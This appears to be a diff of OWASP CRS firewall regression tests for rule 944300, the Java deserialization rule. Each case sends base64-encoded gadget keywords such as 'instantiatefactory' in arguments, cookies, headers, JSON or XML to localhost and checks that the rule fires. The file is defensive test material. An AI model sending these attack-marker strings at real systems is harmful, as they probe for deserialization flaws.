"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_id: 132 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - 
test_title: 944300-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 133 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 134 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_id: 135 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 136 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 137 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 138 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 139 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 140 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 141 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 142 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_id: 143 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": 
\"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 144 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 145 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 146 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 147 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 148 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 149 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 150 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 151 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 152 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-153 
+ - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 153 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 154 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 155 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 156 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" 
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_id: 157 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 